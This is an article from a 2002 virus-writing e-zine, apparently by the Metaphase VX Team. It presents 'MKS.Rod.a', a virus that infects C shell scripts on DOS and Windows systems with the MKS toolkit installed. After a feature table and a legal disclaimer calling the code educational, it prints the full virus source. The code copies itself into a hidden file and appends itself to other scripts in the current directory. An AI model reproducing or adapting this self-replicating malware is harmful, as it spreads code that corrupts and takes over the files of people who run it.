 -=( ---------------------------------------------------------------------- )=-
 -=( Natural Selection Issue #1 --------------------------------- MKS.Rod.a )=-
 -=( ---------------------------------------------------------------------- )=-

 -=( 0 : MKS.Rod.a Features ----------------------------------------------- )=-

 Imports:       None
 Infects:       CSH files with MKS installed
 Strategy:      Single dir run time infection 2 files per run 3 seeks per run
 Compatibility: Windows and DOS with MKS installed
 Saves Stamps:  None
 MultiThreaded: None
 Polymorphism:  None
 AntiAV / EPO:  None
 SEH Abilities: None
 Payload:       Message after infection.

 -=( 1 : MKS.Rod.a Design Goals ------------------------------------------- )=-

 MKS is a commercially available CSH development shell for MS OS's, to be  used
 with C/C++ porting of  unix application to and  from MS DOS TM  and Windows TM
 OS's.

 -=( 2 : MKS.Rod.a Disclaimer --------------------------------------------- )=-

 THE CONTENTS OF  THIS ELECTRONIC MAGAZINE  AND ITS ASSOCIATED  SOURCE CODE ARE
 COVERED UNDER THE BELOW TERMS AND CONDITIONS.  IF YOU DO NOT AGREE TO BE BOUND
 BY THESE TERMS AND CONDITIONS, OR  ARE NOT LEGALLY ENTITLED TO AGREE  TO THEM,
 YOU MUST DISCONTINUE USE OF THIS MAGAZINE IMMEDIATELY.

 COPYRIGHT
 Copyright on  materials in  this  magazine  and  the  information  therein and
 their  arrangement is owned by METAPHASE VX TEAM   unless otherwise indicated.

 RIGHTS AND LIMITATIONS
 You have  the  right  to use,    copy and  distribute  the  material in   this
 magazine free   of  charge,  for  all   purposes  allowed  by your   governing
 laws.  You    are expressly  PROHIBITED   from   using the  material contained
 herein  for   any   purposes  that   would   cause    or would    help promote
 the illegal   use of the material.

 NO WARRANTY
 The  information   contained within   this  magazine  are  provided  "as  is".
 METAPHASE VX TEAM         do    not    warranty    the     accuracy, adequacy,
 or   completeness     of     given  information,  and    expressly   disclaims
 liability   for   errors   or   omissions    contained  therein.   No implied,
 express, or statutory  warranty, is given  in conjunction with  this magazine.

 LIMITATION OF LIABILITY
 In *NO* event will METAPHASE VX TEAM  or any of its MEMBERS be liable for  any
 damages  including  and  without  limitation,  direct  or  indirect,  special,
 incidental,  or  consequential  damages,   losses,  or  expenses  arising   in
 connection with this magazine, or the use thereof.

 ADDITIONAL DISCLAIMER
 Computer viruses will spread of their own accord between computer systems, and
 across international boundaries.  They are raw animals with no concern for the
 law, and for that reason your possession of them makes YOU responsible for the
 actions they carry out.

 The viruses provided in this magazine are for educational purposes ONLY.  They
 are NOT intended for use in  ANY WAY outside of strict, controlled  laboratory
 conditions.  If compiled and executed these viruses WILL land you in court(s).

 You will be held responsible for your actions.  As  source code these  viruses
 are  inert  and   covered   by   implied  freedom   of  speech   laws  in some
 countries.  In  binary form  these viruses  are malicious  weapons.  METAPHASE
 VX TEAM  do not condone the application of these viruses and will NOT be  held
 LIABLE for any MISUSE.

 -=( 3 : MKS.Rod.a -------------------------------------------------------- )=-

#!csh
if ('$1 == 'rod) then
        goto rod$2
endif
if (-f "/_rod") then
        goto rodg
endif
if (! -f "$0") then
        goto rode
endif
find "rod"<$0>/_rod
chmod /_rod +h
rodg:
setenv 5000 shell /_rod rod v
goto rode
rodv:
foreach a (*.*)
        shell /_rod rod i ${a}
end
exit rod
rodi:
find "rod"<$3>nul
set errorlevel=$status
if (${errorlevel} < 1) then
        goto rodj
endif
cat /_rod>>$3
set rod#="${rod#}-"
if (${rod#} == --) then
        exit
endif
rodj:
set rod!="${rod!}-"
if (${rod!} == ---) then
        exit
endif
rode:
echo Welcome to MKS.Rod.a

 -=( ---------------------------------------------------------------------- )=-
 -=( Natural Selection Issue #1 ---------------- (c) 2002 Metaphase VX Team )=-
 -=( ---------------------------------------------------------------------- )=-
